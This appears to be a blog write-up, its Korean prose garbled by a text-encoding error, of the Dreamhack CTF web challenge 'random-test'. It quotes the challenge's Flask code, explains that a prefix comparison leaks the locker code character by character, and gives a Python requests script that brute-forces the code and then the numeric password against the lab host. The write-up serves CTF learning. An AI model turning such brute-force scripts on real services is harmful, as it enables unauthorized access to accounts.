๐ Security/Web
[๋๋ฆผํต(Dreamhack) random-test
Rosieblue
2023. 9. 26. 19:07
728x90
์ด๋ฐ์์ผ๋ก ์ฌ๋ฌผํจ์ด๋ ์๋ฌผ์ ๋น๋ฒ์ ๋ง์ถฐ์ผํ๋ ๋ฌธ์ ์ด๋ค
์ฌ๋ฌผํจ ๋ฒํธ๋ ์ํ๋ฒณ ์๋ฌธ์ ํน์ ์ซ์๋ฅผ ํฌํจํ๋ 4์๋ฆฌ ๋๋ค ๋ฌธ์์ด์ด๊ณ , ๋น๋ฐ๋ฒํธ๋ 100 ์ด์ 200 ์ดํ์ ๋๋ค ์ ์๋ผ๊ณ ํ๋ค
#!/usr/bin/python3
from flask import Flask, request, render_template
import string
import random
app = Flask(__name__)
try:
FLAG = open("./flag.txt", "r").read() # flag is here!
except:
FLAG = "[**FLAG**]"
rand_str = ""
alphanumeric = string.ascii_lowercase + string.digits #์๋ฌธ์ or ์ซ์
for i in range(4):
rand_str += str(random.choice(alphanumeric)) #4๊ธ์
rand_num = random.randint(100, 200) #100~200
@app.route("/", methods = ["GET", "POST"])
def index():
if request.method == "GET":
return render_template("index.html")
else:
locker_num = request.form.get("locker_num", "")
password = request.form.get("password", "")
if locker_num != "" and rand_str[0:len(locker_num)] == locker_num:
if locker_num == rand_str and password == str(rand_num):
return render_template("index.html", result = "FLAG:" + FLAG)
return render_template("index.html", result = "Good")
else:
return render_template("index.html", result = "Wrong!")
app.run(host="0.0.0.0", port=8000)
์ฃผ๋ชฉํด์ผํ ๋ถ๋ถ์ ์๋ ์ฝ๋์ด๋ค
if locker_num != "" and rand_str[0:len(locker_num)] == locker_num:
locker_num๋งํผ๋ง ๋น๊ตํ๊ณ ์๊ธฐ ๋๋ฌธ์ ํ ๊ธ์ ๋น๊ต, ~, ๋ค ๊ธ์ ๋น๊ต ์ด๋ฐ์์ผ๋ก ํ๋ฉด ๋๋ค
locker_num๋ง ๋ง์ผ๋ฉด Good์ ๋ฐํํ๊ธฐ ๋๋ฌธ์ด๋ค!
์ฒ์์ผ๋ก requests ๋ชจ๋์ ์ ๋๋ก ์ด์ฉํด๋ดค๋๋ฐ ์ด ๋ฌธ์ ๋ฅผ ํตํด ์กฐ๊ธ ์ต์ํด์ง ๊ฒ ๊ฐ๋ค!
import requests
import string
url="http://host3.dreamhack.games:16258/"
data={"locker_num":"","password":""}
locker_num=['0','0','0','0']
password="100"
#if locker_num != "" and rand_str[0:len(locker_num)] == locker_num:
alpahnumeric=string.ascii_lowercase+string.digits
for i in range(0,4):
for ch in alpahnumeric:
locker_num[i]=ch
data["locker_num"]=''.join(locker_num[:i+1])
print(data["locker_num"])
r=requests.post(url=url,data=data)
if r.text.find("Good")!=-1:
break
print("Locker_num is",''.join(locker_num))
for i in range(100,201):
#data["locker_num"]=''.join(locker_num)
data["locker_num"]='n7pr'
data["password"]=i
r=requests.post(url=url,data=data)
print(i)
if r.text.find("FLAG")!=-1:
password=data["password"]
print("password is",password)
break